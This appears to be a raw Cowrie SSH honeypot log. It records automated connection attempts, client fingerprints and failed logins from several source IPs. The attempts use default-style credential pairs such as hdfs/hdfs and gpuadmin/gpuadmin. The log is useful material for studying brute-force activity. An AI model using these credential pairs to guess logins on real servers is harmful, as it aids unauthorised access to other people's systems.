{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:43:49.258564Z","src_ip":"93.123.109.189","session":"f92c077392e1"}
{"eventid":"cowrie.login.failed","username":"nodeoperator","password":"nodeoperator","message":"login attempt [nodeoperator/nodeoperator] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:49.318896Z","src_ip":"93.123.109.189","session":"f92c077392e1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36794,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5ea7ff2bc7c","protocol":"ssh","message":"New connection: 196.251.86.249:36794 (1.2.3.4:22) [session: c5ea7ff2bc7c]","sensor":"my-vps","timestamp":"2025-08-26T11:43:50.202821Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:50.339240Z","src_ip":"93.123.109.189","session":"f92c077392e1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:50.734696Z","src_ip":"196.251.86.249","session":"c5ea7ff2bc7c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:43:50.735413Z","src_ip":"196.251.86.249","session":"c5ea7ff2bc7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53702,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d21710707a1","protocol":"ssh","message":"New connection: 212.227.125.160:53702 (1.2.3.4:22) [session: 2d21710707a1]","sensor":"my-vps","timestamp":"2025-08-26T11:43:51.382416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:51.384061Z","src_ip":"212.227.125.160","session":"2d21710707a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:51.433736Z","src_ip":"212.227.125.160","session":"2d21710707a1"}
{"eventid":"cowrie.login.failed","username":"hdfs","password":"hdfs","message":"login attempt [hdfs/hdfs] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:51.600294Z","src_ip":"212.227.125.160","session":"2d21710707a1"}
{"eventid":"cowrie.login.failed","username":"git","password":"321","message":"login attempt [git/321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:52.464931Z","src_ip":"196.251.86.249","session":"c5ea7ff2bc7c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:52.652680Z","src_ip":"212.227.125.160","session":"2d21710707a1"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:53.938424Z","src_ip":"196.251.86.249","session":"c5ea7ff2bc7c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34576,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7cb0ff850d8","protocol":"ssh","message":"New connection: 83.168.105.65:34576 (1.2.3.4:22) [session: f7cb0ff850d8]","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.010747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.011450Z","src_ip":"83.168.105.65","session":"f7cb0ff850d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.047617Z","src_ip":"83.168.105.65","session":"f7cb0ff850d8"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.157861Z","src_ip":"83.168.105.65","session":"f7cb0ff850d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54466,"dst_ip":"1.2.3.4","dst_port":22,"session":"df8ba3c53177","protocol":"ssh","message":"New connection: 212.227.125.160:54466 (1.2.3.4:22) [session: df8ba3c53177]","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.403450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.404685Z","src_ip":"212.227.125.160","session":"df8ba3c53177"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.456269Z","src_ip":"212.227.125.160","session":"df8ba3c53177"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:57.612650Z","src_ip":"212.227.125.160","session":"df8ba3c53177"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:58.196112Z","src_ip":"83.168.105.65","session":"f7cb0ff850d8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:58.794173Z","src_ip":"212.227.125.160","session":"df8ba3c53177"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55234,"dst_ip":"1.2.3.4","dst_port":22,"session":"08f0da7a7dd0","protocol":"ssh","message":"New connection: 212.227.125.160:55234 (1.2.3.4:22) [session: 08f0da7a7dd0]","sensor":"my-vps","timestamp":"2025-08-26T11:44:03.101467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:03.102570Z","src_ip":"212.227.125.160","session":"08f0da7a7dd0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:03.153306Z","src_ip":"212.227.125.160","session":"08f0da7a7dd0"}
{"eventid":"cowrie.login.failed","username":"potok","password":"potok","message":"login attempt [potok/potok] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:03.306918Z","src_ip":"212.227.125.160","session":"08f0da7a7dd0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:04.358027Z","src_ip":"212.227.125.160","session":"08f0da7a7dd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56004,"dst_ip":"1.2.3.4","dst_port":22,"session":"229d87aa0647","protocol":"ssh","message":"New connection: 212.227.125.160:56004 (1.2.3.4:22) [session: 229d87aa0647]","sensor":"my-vps","timestamp":"2025-08-26T11:44:08.836298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:08.837388Z","src_ip":"212.227.125.160","session":"229d87aa0647"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:08.887742Z","src_ip":"212.227.125.160","session":"229d87aa0647"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:09.044542Z","src_ip":"212.227.125.160","session":"229d87aa0647"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:10.099390Z","src_ip":"212.227.125.160","session":"229d87aa0647"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53762,"dst_ip":"1.2.3.4","dst_port":22,"session":"04329abb0965","protocol":"ssh","message":"New connection: 83.168.105.65:53762 (1.2.3.4:22) [session: 04329abb0965]","sensor":"my-vps","timestamp":"2025-08-26T11:44:12.494394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:12.495075Z","src_ip":"83.168.105.65","session":"04329abb0965"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:12.532081Z","src_ip":"83.168.105.65","session":"04329abb0965"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:12.644062Z","src_ip":"83.168.105.65","session":"04329abb0965"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:13.683756Z","src_ip":"83.168.105.65","session":"04329abb0965"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56776,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d7341832ab0","protocol":"ssh","message":"New connection: 212.227.125.160:56776 (1.2.3.4:22) [session: 9d7341832ab0]","sensor":"my-vps","timestamp":"2025-08-26T11:44:16.008230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:16.064592Z","src_ip":"212.227.125.160","session":"9d7341832ab0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:16.065411Z","src_ip":"212.227.125.160","session":"9d7341832ab0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:17.030712Z","src_ip":"212.227.125.160","session":"9d7341832ab0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:18.087997Z","src_ip":"212.227.125.160","session":"9d7341832ab0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57546,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c9b3f7afcae","protocol":"ssh","message":"New connection: 212.227.125.160:57546 (1.2.3.4:22) [session: 8c9b3f7afcae]","sensor":"my-vps","timestamp":"2025-08-26T11:44:21.378107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:21.379416Z","src_ip":"212.227.125.160","session":"8c9b3f7afcae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:21.433827Z","src_ip":"212.227.125.160","session":"8c9b3f7afcae"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:21.592565Z","src_ip":"212.227.125.160","session":"8c9b3f7afcae"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:22.645974Z","src_ip":"212.227.125.160","session":"8c9b3f7afcae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58312,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b5d1a86857","protocol":"ssh","message":"New connection: 212.227.125.160:58312 (1.2.3.4:22) [session: b3b5d1a86857]","sensor":"my-vps","timestamp":"2025-08-26T11:44:27.687913Z"}
